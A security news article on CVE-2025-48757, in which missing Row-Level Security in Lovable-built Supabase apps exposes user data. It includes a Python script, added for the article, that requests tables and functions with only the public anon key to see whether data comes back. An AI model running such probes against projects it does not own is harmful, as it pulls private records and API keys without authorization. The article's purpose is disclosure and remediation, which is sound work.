
Security researcher Matt Palmer has uncovered a critical vulnerability in the Lovable low-code platform, now tracked as CVE-2025-48757, that allows unauthenticated reads and writes of application data because Row-Level Security (RLS) on the Supabase backend is missing or misconfigured. The flaw affects a wide range of apps built with Lovable's Supabase integration, including high-profile sites like Linkable, a platform designed to auto-generate websites from LinkedIn profiles.
With a CVSS score of 9.3, the vulnerability lets threat actors query the backend directly, bypassing authentication checks that the affected apps perform only in the browser, to view sensitive user records and to insert or modify data without authorization.
“Applications developed using its platform often lack secure RLS configurations, allowing unauthorized actors to access sensitive user data and inject malicious data,” Matt Palmer explains.
Lovable applications use a client-heavy architecture: the generated frontend talks directly to backend services such as Supabase for authentication and data storage, using a public (anon) API key that is shipped in the client. Any access check performed only in frontend code is therefore advisory; a request sent straight to the Supabase REST API meets only the RLS policies defined on the tables. The issue is that the access rules the frontend assumes are not actually enforced, or are enforced differently, by those backend policies.
“This architecture shifts the security burden to the implementor… misaligned RLS policies between the client-side logic and backend enforcement frequently result in vulnerabilities,” the report warns.
Palmer found that in many cases, simply modifying one of the app's own network requests to the backend was enough to return an entire table of user data.
The flaw was first noticed on March 20, 2025, in Linkable, which lacked any meaningful RLS enforcement. A modified query allowed full access to the “users” table. Despite public disclosure via Twitter, Lovable initially denied the issue, deleted the site, then later reinstated it with a $2 paywall.
“An inspection of network requests revealed that modifying a query granted access to all data in the project’s ‘users’ table.”
Palmer wrote a custom script to crawl 1,645 Lovable-powered projects and found 303 insecure endpoints across 170 sites (10.3% of the projects examined). These included endpoints exposing highly sensitive data, such as:
- /rest/v1/users
- /rest/v1/transactions
- /functions/v1/get-google-maps-token
- /rest/v1/rpc/get_gemini_api_key
The researcher stresses that this analysis only examined public homepages—suggesting that even more sensitive data could be exposed within authenticated sessions.
Even after Lovable released a "security scan" tool, the vulnerabilities persisted. In a May 24 reassessment, Palmer bypassed access controls on Linkable simply by removing the Authorization header from requests. Not only was data readable, but the backend also accepted unauthenticated POST requests, including ones that set Stripe payment status fields.
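The following script is an added example written for this article; it is not Matt Palmer's crawler and not code from Lovable or Supabase. It performs the read-only version of the checks described above: each endpoint is requested with only the `apikey` header, i.e. with the `Authorization: Bearer <user JWT>` header removed as in the Linkable bypass, and the response is classified according to whether the anon role got data back. The project URL, anon key, endpoint list and the sample responses are placeholders constructed for the example; the endpoint paths mirror the kinds the crawl reported.

```python
"""Black-box check for a Supabase-backed app: can the public anon key alone read
a table or call a function?  Added example for this article, not Matt Palmer's
crawler and not Lovable or Supabase code; project URL, anon key, endpoint list
and sample responses are placeholders.  Run it only against projects you own."""
import json
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse
from typing import Callable, Dict, Iterable, Optional, Tuple

# Placeholders (assumption): a real audit takes both from the app's own JS
# bundle, where Supabase-backed apps ship them by design.
PROJECT_URL = "https://example-project.supabase.co"
ANON_KEY = "<anon key copied from the frontend bundle>"

# Endpoints of the kinds the article lists.
ENDPOINTS = [
    "/rest/v1/users",
    "/rest/v1/transactions",
    "/functions/v1/get-google-maps-token",
    "/rest/v1/rpc/get_gemini_api_key",
]

# A fetcher takes (method, url, headers, body) and returns (status, body text).
Fetcher = Callable[[str, str, Dict[str, str], Optional[bytes]], Tuple[int, str]]


def http_fetch(method: str, url: str, headers: Dict[str, str],
               body: Optional[bytes]) -> Tuple[int, str]:
    """Real round-trip; 4xx/5xx responses are returned as data, not raised."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")
    except URLError as err:
        return 0, str(err.reason)


# Constructed sample responses (not captured from any real site), modelled on
# the behaviours the article describes.
SAMPLE_RESPONSES = {
    "/rest/v1/users": (200, json.dumps([{"id": 1, "email": "a@example.com"}])),
    "/rest/v1/transactions": (200, "[]"),  # RLS enabled, no policy for anon
    "/functions/v1/get-google-maps-token":
        (401, '{"code":401,"message":"Missing authorization header"}'),
    "/rest/v1/rpc/get_gemini_api_key": (200, '"placeholder-api-key"'),
}


def sample_fetch(method: str, url: str, headers: Dict[str, str],
                 body: Optional[bytes]) -> Tuple[int, str]:
    """Offline stand-in for http_fetch, keyed on the request path."""
    return SAMPLE_RESPONSES.get(urlparse(url).path, (404, '{"message":"not found"}'))


def request_for(path: str) -> Tuple[str, Optional[bytes]]:
    """Tables are read with GET; RPC and edge functions are invoked with POST."""
    if path.startswith("/rest/v1/rpc/") or path.startswith("/functions/v1/"):
        return "POST", b"{}"
    return "GET", None


def classify(status: int, body: str) -> str:
    """Verdict for a response obtained with the anon key and no user JWT."""
    if status in (401, 403):
        return "denied"      # RLS/grants or the function's own auth refused us
    if status == 404:
        return "absent"      # nothing exposed under that name
    if status != 200:
        return "unknown"
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unknown"
    if isinstance(data, list):
        # RLS enabled with no policy matching anon also yields 200 and [], so
        # an empty list is inconclusive; only returned rows prove exposure.
        return "exposed" if data else "no-rows"
    return "exposed"         # object or scalar, e.g. an RPC handing back a key


def probe(base_url: str, anon_key: str, paths: Iterable[str],
          fetch: Fetcher = http_fetch) -> Dict[str, str]:
    """Send each request with only the apikey header (no Authorization: Bearer
    <user JWT>, as in the article's bypass), so it runs as the anon role."""
    results: Dict[str, str] = {}
    for path in paths:
        method, body = request_for(path)
        headers = {"apikey": anon_key, "Accept": "application/json"}
        if body is not None:
            headers["Content-Type"] = "application/json"
        url = base_url.rstrip("/") + path
        if method == "GET":
            url += "?select=*&limit=5"  # a few rows are enough to prove readability
        status, text = fetch(method, url, headers, body)
        results[path] = classify(status, text)
    return results


if __name__ == "__main__":
    # Offline run on the constructed responses; use the default http_fetch
    # to audit a project you own.
    for path, verdict in probe(PROJECT_URL, ANON_KEY, ENDPOINTS, fetch=sample_fetch).items():
        print(f"{verdict:8} {path}")
```

Two caveats when reading the verdicts. A `200` with `[]` is not a clean bill of health: PostgREST returns that both for an empty table and for a table where RLS is enabled but no policy grants the anon role anything, so it only means the check was inconclusive. And the script deliberately does not attempt the write side of the bypass (the accepted POSTs the article describes); a write check modifies someone's data and belongs only in a test against your own project. On the backend the fix is to enable RLS on every table the REST API exposes (`ALTER TABLE public.users ENABLE ROW LEVEL SECURITY`) and to add policies that tie rows to the caller, typically via `auth.uid()`, rather than relying on checks the browser performs.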
“Lovable confirmed receipt, but never responded… With no meaningful remediation or user notification, we published our CVE,” Palmer writes.
CVE-2025-48757 is not a single bug but a systemic design failure: a low-code platform that hands backend access control to the implementer without enforcing it. Supabase itself supports robust RLS, but Lovable's abstraction layer leaves generated apps exposed whenever those policies are absent or written incorrectly.
Palmer warns: “Users interacting with Lovable-built sites should exercise extreme caution in the data they submit.”